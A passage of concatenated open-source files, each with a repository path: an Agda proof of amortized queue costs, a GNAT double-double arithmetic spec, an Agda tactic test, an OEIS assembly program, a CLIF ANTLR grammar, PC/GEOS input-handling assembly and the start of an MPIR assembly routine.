(Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (IntP.+-comm (Int.+ ϕ q' Int.- Int.+ ϕ q) (Int.+ ϕ/-1 os q' Int.- (Int.+ ϕ/0 os q'))) ⟩ Int.+ ϕ/-1 os q' Int.- Int.+ ϕ/0 os q' Int.+ (Int.+ ϕ q' Int.- Int.+ ϕ q) Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (IntP.+-minus-telescope (Int.+ ϕ/-1 os q') (Int.+ ϕ q') (Int.+ ϕ q)) ⟩ Int.+ ϕ/-1 os q' Int.- Int.+ ϕ q Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (IntP.m-n≡m⊖n (ϕ/-1 os q') (ϕ q )) ⟩ ϕ/-1 os q' Int.⊖ ϕ q Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ refl ⟩ ϕ/-1 os q' Int.⊖ ϕ q Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ∎ ) )) where open ≡-Reasoning data Amortized : List op → List ℕ → Set where a/emp : Amortized [] [] a/cons : ∀ o k l l' → is/acost o k → Amortized l l' → Amortized (o ∷ l) (k ∷ l') amortized≥cost/tele : ∀ q0 l l' → Amortized l l' → Int.+ (lsum l') Int.≥ op/seq/cost/tele l q0 amortized≥cost/tele q .[] .[] a/emp = IntP.≤-refl amortized≥cost/tele q .(o ∷ os) .(k ∷ l') (a/cons o k os l' x h) rewrite tbind/meta Q Int.ℤ (o operate q) (λ q' → (Int.+ (op/cost o q)) Int.+ (o operateϕ q Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q')) (λ z → z Int.≤ Int.+ lsum (k ∷ l')) = dbind (λ q' → meta ((Int.+ (op/cost o q)) Int.+ (o operateϕ q Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q') Int.≤ Int.+ lsum (k ∷ l'))) (o operate q) λ q' → begin Int.+ op/cost o q Int.+ ((o operateϕ q) Int.⊖ ϕ q) Int.+ op/seq/cost/tele os q' ≤⟨ IntP.+-monoˡ-≤ (op/seq/cost/tele os q') (x q) ⟩ Int.+ k Int.+ op/seq/cost/tele os q' ≤⟨ IntP.+-monoʳ-≤ (Int.+ k) (amortized≥cost/tele q' os l' h) ⟩ Int.+ k Int.+ Int.+ lsum l' ≤⟨ IntP.≤-refl ⟩ Int.+ k Int.+ Int.+ lsum l' ∎ where open IntP.≤-Reasoning -- Sum of a sequence of amortized costs (plus the initial potential) bounds the sum of the sequence of actual costs amortized≥cost : ∀ q l l' → Amortized l l' → ◯ (Int.+ (ϕ q + lsum l') Int.≥ Int.+ (op/seq/cost l q)) amortized≥cost q l l' h u = begin Int.+ (op/seq/cost l q) ≤⟨ IntP.n≤m+n (0 + ϕ/-1 l q) ⟩ Int.0ℤ Int.+ (Int.+ ϕ/-1 l q) Int.+ Int.+ op/seq/cost l q ≡⟨ P.cong (λ x → x Int.+ (Int.+ ϕ/-1 l q) Int.+ Int.+ op/seq/cost l q) (P.sym (IntP.n⊖n≡0 (ϕ q))) ⟩ ϕ q Int.⊖ ϕ q Int.+ Int.+ ϕ/-1 l q Int.+ Int.+ op/seq/cost l q ≡⟨ P.cong (λ x → x Int.+ (Int.+ ϕ/-1 l q) Int.+ Int.+ op/seq/cost l q) (P.sym (IntP.m-n≡m⊖n (ϕ q) (ϕ q))) ⟩ Int.+ ϕ q Int.+ Int.- (Int.+ ϕ q) Int.+ Int.+ ϕ/-1 l q Int.+ Int.+ op/seq/cost l q ≡⟨ P.cong (λ x → x Int.+ Int.+ op/seq/cost l q) (IntP.+-assoc (Int.+ ϕ q) (Int.- (Int.+ ϕ q)) (Int.+ ϕ/-1 l q)) ⟩ Int.+ ϕ q Int.+ (Int.- (Int.+ ϕ q) Int.+ Int.+ ϕ/-1 l q) Int.+ Int.+ op/seq/cost l q ≡⟨ P.cong (λ x → Int.+ ϕ q Int.+ x Int.+ Int.+ op/seq/cost l q) (IntP.+-comm (Int.- (Int.+ ϕ q)) (Int.+ ϕ/-1 l q)) ⟩ Int.+ ϕ q Int.+ (Int.+ ϕ/-1 l q Int.- (Int.+ ϕ q)) Int.+ Int.+ op/seq/cost l q ≡⟨ IntP.+-assoc (Int.+ ϕ q) (Int.+ ϕ/-1 l q Int.- (Int.+ ϕ q)) (Int.+ op/seq/cost l q) ⟩ Int.+ ϕ q Int.+ (Int.+ ϕ/-1 l q Int.- Int.+ ϕ q Int.+ Int.+ op/seq/cost l q) ≡⟨ P.cong (λ x → Int.+ ϕ q Int.+ (x Int.+ Int.+ op/seq/cost l q)) (IntP.m-n≡m⊖n (ϕ/-1 l q) (ϕ q)) ⟩ Int.+ ϕ q Int.+ (ϕ/-1 l q Int.⊖ ϕ q Int.+ Int.+ op/seq/cost l q) ≡⟨ P.cong (λ x → Int.+ ϕ q Int.+ x) (P.sym (cost≡cost/tele l q u)) ⟩ Int.+ ϕ q Int.+ op/seq/cost/tele l q ≤⟨ IntP.+-monoʳ-≤ (Int.+ ϕ q) (amortized≥cost/tele q l l' h) ⟩ Int.+ ϕ q Int.+ Int.+ lsum l' ≤⟨ IntP.≤-refl ⟩ Int.+ ϕ q Int.+ Int.+ lsum l' ∎ where open IntP.≤-Reasoning -- Amortized cost for enq and deq on a front-back queue enq/acost : ∀ x → ◯ (is/acost (op/enq x) 2) enq/acost x u (f , b) = begin (Int.+ (op/cost (op/enq x) (f , b))) Int.+ (((op/enq x) operateϕ (f , b)) Int.⊖ (ϕ (f , b))) ≡⟨⟩ Int.0ℤ Int.+ ((len f + 2 * (1 + len b)) Int.⊖ (ϕ (f , b))) ≡⟨ IntP.+-identityˡ ((len f + 2 * (1 + len b)) Int.⊖ (ϕ (f , b))) ⟩ len f + 2 * (1 + len b) Int.⊖ ϕ (f , b) ≡⟨ P.cong (λ x → (len f + x) Int.⊖ (ϕ (f , b))) (*-distribˡ-+ 2 1 (len b)) ⟩ len f + (2 * 1 + 2 * len b) Int.⊖ ϕ (f , b) ≡⟨ P.cong (λ x → (len f + x) Int.⊖ (ϕ (f , b)) ) (+-comm 2 (2 * len b)) ⟩ len f + (2 * len b + 2) Int.⊖ ϕ (f , b) ≡⟨ P.cong (λ x → x Int.⊖ (ϕ (f , b))) (P.sym (+-assoc (len f) (2 * len b) 2)) ⟩ len f + 2 * len b + 2 Int.⊖ ϕ (f , b) ≡⟨ P.cong (λ x → (len f + 2 * len b + 2) Int.⊖ x) (P.sym (+-identityʳ (ϕ (f , b)))) ⟩ len f + 2 * len b + 2 Int.⊖ (ϕ (f , b) + 0) ≡⟨ IntP.+-cancelˡ-⊖ (len f + 2 * len b) 2 0 ⟩ Int.+ 2 ∎ where open IntP.≤-Reasoning n+n≡2*n : ∀ n → n + n ≡ 2 * n n+n≡2*n n = begin n + n ≡⟨ P.cong (λ x → n + x) (P.sym (+-identityʳ n)) ⟩ 2 * n ∎ where open ≡-Reasoning deq/acost : ◯ (is/acost op/deq 0) deq/acost u (f , b) = list/match f (λ f → meta ((Int.+ (op/cost op/deq (f , b))) Int.+ ((op/deq operateϕ (f , b)) Int.⊖ (ϕ (f , b))) Int.≤ Int.0ℤ)) ( list/match b (λ b → meta ((Int.+ (op/cost op/deq (nil , b))) Int.+ ((op/deq operateϕ (nil , b)) Int.⊖ (ϕ (nil , b))) Int.≤ Int.0ℤ)) IntP.≤-refl λ a b' → begin (Int.+ (op/cost op/deq (nil , cons a b'))) Int.+ ((op/deq operateϕ (nil , cons a b')) Int.⊖ (ϕ (nil , cons a b'))) ≡⟨⟩ Int.+ (step cost 1 (2 + len b')) Int.+ (step cost 1 (len b') Int.⊖ (2 * (step cost 1 (1 + len b')))) ≡⟨ cong₂ Int._+_ (cong Int.+_ (step/ext cost (2 + len b') 1 u)) (cong₂ Int._⊖_ (step/ext cost (len b') 1 u) (cong (2 *_) (step/ext cost (1 + len b') 1 u)) ) ⟩ Int.+ (2 + len b') Int.+ (len b' Int.⊖ (2 * (1 + len b'))) ≡⟨ IntP.distribʳ-⊖-+-pos (2 + len b') (len b') (2 * (1 + len b')) ⟩ 2 + len b' + len b' Int.⊖ 2 * (1 + len b') ≡⟨ P.cong (λ x → x Int.⊖ 2 * (1 + len b')) (+-assoc 2 (len b') (len b')) ⟩ 2 + (len b' + len b') Int.⊖ 2 * (1 + len b') ≡⟨ P.cong (λ x → 2 + (len b' + len b') Int.⊖ x) (*-distribˡ-+ 2 1 (len b')) ⟩ 2 + (len b' + len b') Int.⊖ (2 * 1 + 2 * len b') ≡⟨ P.cong (λ x → 2 + x Int.⊖ (2 + 2 * len b')) (n+n≡2*n (len b')) ⟩ 2 + 2 * len b' Int.⊖ (2 + 2 * len b') ≡⟨ IntP.n⊖n≡0 (2 + 2 * len b') ⟩ Int.0ℤ ∎ ) λ a f' → begin (Int.+ (op/cost op/deq (cons a f' , b))) Int.+ ((op/deq operateϕ (cons a f' , b)) Int.⊖ (ϕ (cons a f' , b))) ≡⟨⟩ Int.+ (step cost 1 1) Int.+ (step cost 1 (len f' + 2 * len b) Int.⊖ (step cost 1 (1 + len f') + 2 * len b)) ≡⟨ cong₂ Int._+_ (cong Int.+_ (step/ext cost 1 1 u)) (cong₂ Int._⊖_ (step/ext cost (len f' + 2 * len b) 1 u) (cong (_+ 2 * len b) (step/ext cost (1 + len f') 1 u)) ) ⟩ Int.+ 1 Int.+ ((len f' + 2 * len b) Int.⊖ (1 + len f' + 2 * len b)) ≡⟨ IntP.distribʳ-⊖-+-pos 1 (len f' + 2 * len b) (1 + len f' + 2 * len b) ⟩ 1 + (len f' + 2 * len b) Int.⊖ (1 + len f' + 2 * len b) ≡⟨ P.cong (λ x → x Int.⊖ (1 + len f' + 2 * len b)) (P.sym (+-assoc 1 (len f') (2 * len b))) ⟩ 1 + len f' + 2 * len b Int.⊖ (1 + len f' + 2 * len b) ≡⟨ IntP.n⊖n≡0 (1 + len f' + 2 * len b) ⟩ Int.0ℤ ∎ where open IntP.≤-Reasoning all2s : ℕ → List ℕ all2s n = tabulate {n = n} (λ _ → 2) sum2s : ∀ n → lsum (all2s n) ≡ 2 * n sum2s zero = refl sum2s (suc n) = begin 2 + lsum (all2s n) ≡⟨ P.cong (λ x → 2 + x) (sum2s n) ⟩ 2 + 2 * n ≡⟨ P.cong (λ x → x + 2 * n) (*-identityʳ 2) ⟩ 2 * 1 + 2 * n ≡⟨ P.sym (*-distribˡ-+ 2 1 n) ⟩ 2 * (1 + n) ∎ where open ≡-Reasoning all2s/is/acost : ∀ l → ◯ (Amortized l (all2s (length l))) all2s/is/acost [] u = a/emp all2s/is/acost ((op/enq x) ∷ os) u = a/cons (op/enq x) 2 os (all2s (length os)) (enq/acost x u) (all2s/is/acost os u) all2s/is/acost (op/deq ∷ os) u = a/cons op/deq 2 os (all2s (length os)) (acost/weaken z≤n (deq/acost u)) (all2s/is/acost os u) op/seq/cost≤ϕ₀+2*|l| : ∀ q l → ◯ (Int.+ (op/seq/cost l q) Int.≤ Int.+ (ϕ q + 2 * length l)) op/seq/cost≤ϕ₀+2*|l| q l u = begin Int.+ (op/seq/cost l q) ≤⟨ amortized≥cost q l (all2s (length l)) (all2s/is/acost l u) u ⟩ Int.+ (ϕ q + lsum (all2s (length l))) ≡⟨ P.cong (λ x → Int.+ (ϕ q + x)) (sum2s (length l)) ⟩ Int.+ (ϕ q + 2 * length l) ≤⟨ IntP.≤-refl ⟩ Int.+ (ϕ q + 2 * length l) ∎ where open IntP.≤-Reasoning -- Starting with an empty queue, a sequence of n operations costs at most 2 * n op/seq≤2*|l| : ∀ l → IsBounded Q (l op/seq emp) (2 * length l) op/seq≤2*|l| l = bound/relax (λ u → IntP.drop‿+≤+ (op/seq/cost≤ϕ₀+2*|l| emp l u)) (op/seq≤op/seq/cost l emp)

bb-runtimes/runtimes/ravenscar-full-stm32g474/gnat/s-dourea.ads

JCGobbi/Nucleo-STM32G474RE

0

17191

<gh_stars>0 ------------------------------------------------------------------------------ -- -- -- GNAT COMPILER COMPONENTS -- -- -- -- S Y S T E M . D O U B L E _ R E A L -- -- -- -- S p e c -- -- -- -- Copyright (C) 2021, Free Software Foundation, Inc. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- -- -- -- -- -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ -- This package contains routines for supporting floating-point computations -- in double precision, i.e. using a second number to estimate the error due -- to rounding and more generally performing computations with twice as many -- bits of mantissa. It is based on the Double-Double library available at -- https://www.davidhbailey.com/dhbsoftware written by <NAME> et al. generic type Num is digits <>; package System.Double_Real is pragma Pure; type Double_T is record Hi, Lo : Num; end record; function To_Double (N : Num) return Double_T is ((Hi => N, Lo => 0.0)); -- Convert a single to a double real function To_Single (D : Double_T) return Num is (D.Hi); -- Convert a double to a single real function Quick_Two_Sum (A, B : Num) return Double_T with Pre => A = 0.0 or else abs (A) >= abs (B); -- Compute A + B and its rounding error exactly, but assume |A| >= |B| function Two_Sum (A, B : Num) return Double_T; -- Compute A + B and its rounding error exactly function Two_Diff (A, B : Num) return Double_T; -- Compute A - B and its rounding error exactly function Two_Prod (A, B : Num) return Double_T; -- Compute A * B and its rounding error exactly function Two_Sqr (A : Num) return Double_T; -- Compute A * A and its rounding error exactly function "+" (A : Double_T; B : Num) return Double_T; function "-" (A : Double_T; B : Num) return Double_T; function "*" (A : Double_T; B : Num) return Double_T; function "/" (A : Double_T; B : Num) return Double_T with Pre => B /= 0.0; -- Mixed precision arithmetic operations function "+" (A, B : Double_T) return Double_T; function "-" (A, B : Double_T) return Double_T; function "*" (A, B : Double_T) return Double_T; function "/" (A, B : Double_T) return Double_T with Pre => B.Hi /= 0.0; -- Double precision arithmetic operations function Sqr (A : Double_T) return Double_T; -- Faster version of A * A function "=" (A : Double_T; B : Num) return Boolean is (A.Hi = B and then A.Lo = 0.0); function "<" (A : Double_T; B : Num) return Boolean is (A.Hi < B or else (A.Hi = B and then A.Lo < 0.0)); function "<=" (A : Double_T; B : Num) return Boolean is (A.Hi < B or else (A.Hi = B and then A.Lo <= 0.0)); function ">" (A : Double_T; B : Num) return Boolean is (A.Hi > B or else (A.Hi = B and then A.Lo > 0.0)); function ">=" (A : Double_T; B : Num) return Boolean is (A.Hi > B or else (A.Hi = B and then A.Lo >= 0.0)); -- Mixed precision comparisons function "=" (A, B : Double_T) return Boolean is (A.Hi = B.Hi and then A.Lo = B.Lo); function "<" (A, B : Double_T) return Boolean is (A.Hi < B.Hi or else (A.Hi = B.Hi and then A.Lo < B.Lo)); function "<=" (A, B : Double_T) return Boolean is (A.Hi < B.Hi or else (A.Hi = B.Hi and then A.Lo <= B.Lo)); function ">" (A, B : Double_T) return Boolean is (A.Hi > B.Hi or else (A.Hi = B.Hi and then A.Lo > B.Lo)); function ">=" (A, B : Double_T) return Boolean is (A.Hi > B.Hi or else (A.Hi = B.Hi and then A.Lo >= B.Lo)); -- Double precision comparisons generic type Uns is mod <>; function From_Unsigned (U : Uns) return Double_T; -- Convert Uns to Double_T generic type Uns is mod <>; function To_Unsigned (D : Double_T) return Uns with Pre => D >= 0.0; -- Convert Double_T to Uns with truncation end System.Double_Real;

test/Succeed/Tactic.agda

hborum/agda

3

11226

<filename>test/Succeed/Tactic.agda open import Common.Prelude open import Common.Reflection open import Common.Equality postulate trustme : ∀ {a} {A : Set a} {x y : A} → x ≡ y magic : List (Arg Type) → Term → Tactic magic _ _ = give (def (quote trustme) []) id : ∀ {a} {A : Set a} → A → A id x = x science : List (Arg Type) → Term → Tactic science _ _ = give (def (quote id) []) by-magic : ∀ n → n + 4 ≡ 3 by-magic n = tactic magic by-science : ∀ n → 0 + n ≡ n by-science n = tactic science | refl

programs/oeis/174/A174192.asm

neoneye/loda

22

82917

<gh_stars>10-100 ; A174192: Expansion of (1-x+2x^2)/ ((1-x)*(1-2x-x^2)). ; 1,2,7,18,45,110,267,646,1561,3770,9103,21978,53061,128102,309267,746638,1802545,4351730,10506007,25363746,61233501,147830750,356895003,861620758,2080136521,5021893802,12123924127 add $0,1 seq $0,78343 ; a(0) = -1, a(1) = 2; a(n) = 2*a(n-1) + a(n-2). sub $0,1

clif/CLIF.g4

augustand/grammars-v4

1

20

<reponame>augustand/grammars-v4<gh_stars>1-10 /* [The "BSD licence"] Copyright (c) 2015 <NAME> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /* Derived from ISO/IEC STANDARD 24707 First edition 2007-10-01 http://standards.iso.org/ittf/PubliclyAvailableStandards/c039175_ISO_IEC_24707_2007%28E%29.zip with bug fixes from http://metadata-standards.org/Document-library/Documents-by-number/WG2-N1701-N1750/WG2N1703_24707-defect-report.pdf example clif ontologies available from COLORE http://stl.mie.utoronto.ca/colore/ */ grammar CLIF; //A.2.3.1 Term sequence termseq : (term | SEQMARK)* ; //A.2.3.2 Name interpretedname : NUMERAL | QUOTEDSTRING ; interpretablename : NAMECHARSEQUENCE | ENCLOSEDNAME ; name : interpretedname | interpretablename ; //A.2.3.3 Term term : name | OPEN operator termseq CLOSE | OPEN 'cl-comment' QUOTEDSTRING term CLOSE ; operator : term ; //A.2.3.4 Equation equation : OPEN '=' term term CLOSE ; //A.2.3.5 Sentence sentence : atomsent | boolsent | quantsent | commentsent ; //A.2.3.6 Atomic sentence atomsent : equation | atom ; atom : OPEN predicate termseq CLOSE | OPEN term OPEN 'cl-roleset' (OPEN name term CLOSE) CLOSE CLOSE ; predicate : term ; //A.2.3.7 Boolean sentence boolsent : OPEN ('and' | 'or') sentence* CLOSE | OPEN ('if' | 'iff') sentence sentence CLOSE | OPEN 'not' sentence CLOSE ; //A.2.3.8 Quantified sentence quantsent : OPEN ('forall' | 'exists') interpretablename? boundlist sentence CLOSE ; boundlist : OPEN ( interpretablename | SEQMARK | OPEN (interpretablename | SEQMARK) term CLOSE )* CLOSE ; //A.2.3.9 Commented sentence commentsent : OPEN 'cl-comment' ENCLOSEDNAME sentence CLOSE ; //A.2.3.10 Module module : OPEN 'cl-module' interpretablename (OPEN 'cl-excludes' name* CLOSE)? cltext? CLOSE ; //A.2.3.11 Phrase phrase : sentence | module | OPEN 'cl-imports' interpretablename CLOSE | OPEN 'cl-comment' ENCLOSEDNAME cltext? CLOSE ; text : phrase+ ; cltext : module | namedtext | text ; namedtext : OPEN 'cl-text' interpretablename text? CLOSE ; //A.2.2.2 Delimiters OPEN : '('; CLOSE : ')'; STRINGQUOTE : '\''; NAMEQUOTE : '"'; BACKSLASH : '\\'; //A.2.2.3 Characters fragment CHAR : [0-9~!#$%^&*_+{}|:<>?`\-=\[\];,./A-Za-z]; fragment DIGIT : [0-9]; fragment HEXA : [0-9A-Fa-f]; //A.2.2.4 Quoting within strings fragment NONASCII : '\\' 'u' HEXA HEXA HEXA HEXA | '\\' 'U' HEXA HEXA HEXA HEXA HEXA HEXA ; fragment INNERSTRINGQUOTE : '\'' ; fragment INNERNAMEQUOTE : '\"' ; fragment INNERBACKSLASH : '\\'; NUMERAL : DIGIT+; SEQMARK : '...' CHAR*; //A.2.2.5 Quoted strings QUOTEDSTRING : STRINGQUOTE (WHITE | OPEN | CLOSE | CHAR | NONASCII | NAMEQUOTE | INNERSTRINGQUOTE | INNERBACKSLASH )* STRINGQUOTE ; ENCLOSEDNAME : NAMEQUOTE (WHITE | OPEN | CLOSE | CHAR | NONASCII | STRINGQUOTE | INNERNAMEQUOTE )* NAMEQUOTE ; //A.2.2.6 Reserved tokens EQUAL : '='; AND : 'and'; OR : 'or'; IFF : 'iff'; IF : 'if'; FORALL : 'forall'; EXISTS : 'exists'; NOT : 'not'; CL_ROLESET : 'cl-roleset'; CL_TEXT : 'cl-text'; CL_IMPORTS : 'cl-imports'; CL_EXCLUDES : 'cl-excludes'; CL_MODULE : 'cl-module'; CL_COMMENT : 'cl-comment'; CL_PREFIX : 'cl-prefix'; //A.2.2.7 Name character sequence NAMECHARSEQUENCE : ( CHAR (CHAR | STRINGQUOTE | NAMEQUOTE | BACKSLASH)* ) ; // A.2.2.1 White space WHITE : [ \t\n\r\v] -> skip ; BLOCKCOMMENT : '/*' (BLOCKCOMMENT | .)*? '*/' -> skip // nesting allowed (but should it be?) ; LineComment : '//' ~[\u000A\u000D]* -> skip ;

src/main/fragment/mos6502-common/vbuyy=vbuc1.asm

jbrandwood/kickc

2

104909

ldy #{c1}

Library/User/User/userFlowMisc.asm

steakknife/pcgeos

504

168180

<filename>Library/User/User/userFlowMisc.asm COMMENT @----------------------------------------------------------------------- Copyright (c) GeoWorks 1988 -- All Rights Reserved PROJECT: PC GEOS MODULE: UserInterface/User FILE: userFlowMisc.asm ROUTINES: Name Description ---- ----------- ; Global routines, callable from ANY thread ; ; Button utilities ; GLB FlowTranslatePassiveButton ; Translate a ; MSG_META_PRE_PASSIVE_BUTTON or ; MSG_META_POST_PASSIVE_BUTTON to a ; generic method GLB FlowGetUIButtonFlags ; Return the current UIButtonFlag GLB FlowCheckKbdShortcut REVISION HISTORY: Name Date Description ---- ---- ----------- Doug 3/89 Initial version Doug 12/89 Cleaned up file organization DESCRIPTION: This file contains routines to handle input processing for the User Interface. $Id: userFlowMisc.asm,v 1.1 97/04/07 11:46:00 newdeal Exp $ -------------------------------------------------------------------------------@ FlowCommon segment resource COMMENT @---------------------------------------------------------------------- FUNCTION: FlowTranslatePassiveButton DESCRIPTION: Translate a MSG_META_PRE_PASSIVE_BUTTON or MSG_META_POST_PASSIVE_BUTTON to a generic method CALLED BY: GLOBAL PASS: ax - MSG_META_PRE_PASSIVE_BUTTON or MSG_META_POST_PASSIVE_BUTTON cx, dx - mouse position (not used here, but left intact through call) bp - Data as passed in bp to above methods: low - ButtonInfo mask BI_PRESS - set if press mask BI_DOUBLE_PRESS - set if double-press mask BI_B3_DOWN - state of button 3 mask BI_B2_DOWN - state of button 2 mask BI_B1_DOWN - state of button 1 mask BI_B0_DOWN - state of button 0 high - UIFunctionsActive RETURN: ax, cx, dx, bp - translated method (ready to send) DESTROYED: REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- Tony 3/89 Initial version ------------------------------------------------------------------------------@ FlowTranslatePassiveButton proc far if (0) push ds push ax mov ax, segment idata mov ds, ax pop ax cmp ax,MSG_META_PRE_PASSIVE_BUTTON mov ax,MSG_META_PRE_PASSIVE_START_SELECT - MSG_META_START_SELECT jz FTPB_10 mov ax,MSG_META_POST_PASSIVE_START_SELECT - MSG_META_START_SELECT FTPB_10: EC < tst ds:[activeMouseMethod] > EC < ERROR_Z UI_ERROR_CURRENT_MOUSE_MSG_SHOULD_NOT_BE_NULL > add ax,ds:[activeMouseMethod] ;add method ;get [UIFunctionsActive | buttonInfo] ; mov bp,word ptr ds:[activeMouseButtonInfo] pop ds else push bx mov bx, bp cmp ax, MSG_META_PRE_PASSIVE_BUTTON mov ax, MSG_META_PRE_PASSIVE_START_SELECT - MSG_META_START_SELECT jz prePostDone mov ax,MSG_META_POST_PASSIVE_START_SELECT - MSG_META_START_SELECT prePostDone: test bh, mask UIFA_SELECT jnz startSelect test bh, mask UIFA_MOVE_COPY jnz moveCopy test bh, mask UIFA_FEATURES jnz features ;other: add ax, MSG_META_START_OTHER jmp short haveFunction startSelect: add ax, MSG_META_START_SELECT jmp short haveFunction moveCopy: add ax, MSG_META_START_MOVE_COPY jmp short haveFunction features: add ax, MSG_META_START_FEATURES haveFunction: test bl, mask BI_PRESS jnz havePressRelease inc ax ; switch to END method if release havePressRelease: pop bx endif ret FlowTranslatePassiveButton endp FlowCommon ends ; ;------------------- ; Resident segment resource COMMENT @---------------------------------------------------------------------- FUNCTION: FlowGetUIButtonFlags DESCRIPTION: Return the current UIButtonFlags CALLED BY: GLOBAL PASS: none RETURN: al - UIButtonFlags (UIBF_CLICK_TO_TYPE, etc) DESTROYED: REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- Tony 3/89 Initial version Doug 5/91 Changed name, changed to only get ButtonFlags ------------------------------------------------------------------------------@ FlowGetUIButtonFlags proc far push ds push ax mov ax, segment idata mov ds, ax pop ax mov al, ds:[uiButtonFlags] ; get UIButtonFlags var pop ds ret FlowGetUIButtonFlags endp ife FULL_EXECUTE_IN_PLACE Resident ends ; ;--------------- ; Navigation segment resource endif COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% FlowCheckKbdShortcut %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Check to see if the key event maps to a shortcut. CALLED BY: utility PASS: ds:si = pointer to a shortcut table. (ds:si *can* be pointing to the movable XIP code resource.) ax = # of entries in the table. same as MSG_META_KBD_CHAR: cl - Character (Chars or VChar) ch - CharacterSet (CS_BSW or CS_CONTROL) dl - CharFlags dh - ShiftState (left from conversion) bp low - ToggleState bp high - scan code RETURN: si = offset into table where shortcut was found. carry set if a kbd shortcut match was found. DESTROYED: nothing PSEUDO CODE/STRATEGY: Should cache entry point and deal with changing keyboard drivers REVISION HISTORY: Name Date Description ---- ---- ----------- jcw 2/20/90 Initial version Eric/Tony 2/21/90 moved from User/Text to User/User/userFlowUtils %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ FlowCheckKbdShortcut proc far uses bx, es, ds, di .enter sub sp, size dword mov di, sp segmov es, ds ; es:si <- ptr to table. push ax, si mov ax, GDDT_KEYBOARD call GeodeGetDefaultDriver ; ax <- keyboard driver mov bx, ax ; bx <- kbd driver handle. call GeodeInfoDriver ; ds:si <- ptr to struct. mov ax, ds:[si].DIS_strategy.segment mov bx, ds:[si].DIS_strategy.offset mov ({fptr} ss:[di]).segment, ax ; Save strategy routine addr. mov ({fptr} ss:[di]).offset, bx pop ax, si mov bx, di ; ss:bx = entry point mov di, DR_KBD_CHECK_SHORTCUT call {fptr} ss:[bx] ; Call the driver. lea sp, ss:[bx][size dword] ; preserve carry .leave ret FlowCheckKbdShortcut endp if FULL_EXECUTE_IN_PLACE Resident ends else Navigation ends endif

LibSource/mpir/mpn/x86_64/nehalem/rsh_divrem_hensel_qr_1_2.asm

ekzyis/CrypTool-2

12

102695

<reponame>ekzyis/CrypTool-2 dnl X86_64 mpn_rsh_divrem_hensel_qr_1_2 dnl Copyright 2009 <NAME> dnl This file is part of the MPIR Library. dnl The MPIR Library is free software; you can redistribute it and/or modify dnl it under the terms of the GNU Lesser General Public License as published dnl by the Free Software Foundation; either version 2.1 of the License, or (at dnl your option) any later version. dnl The MPIR Library is distributed in the hope that it will be useful, but dnl WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY dnl or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public dnl License for more details. dnl You should have received a copy of the GNU Lesser General Public License dnl along with the MPIR Library; see the file COPYING.LIB. If not, write dnl to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, dnl Boston, MA 02110-1301, USA. include(`../config.m4') C (rdi,rdx)=( (rsi,rdx)-r9 / rcx ) >> r8 rdx>=1 C rax=hensel remainder from div C This is divrem_hensel_1_2 with shifting on the output of the quotient define(`MOVQ',`movd') ASM_START() PROLOGUE(mpn_rsh_divrem_hensel_qr_1_2) C // 3limb minimum for the mo mov 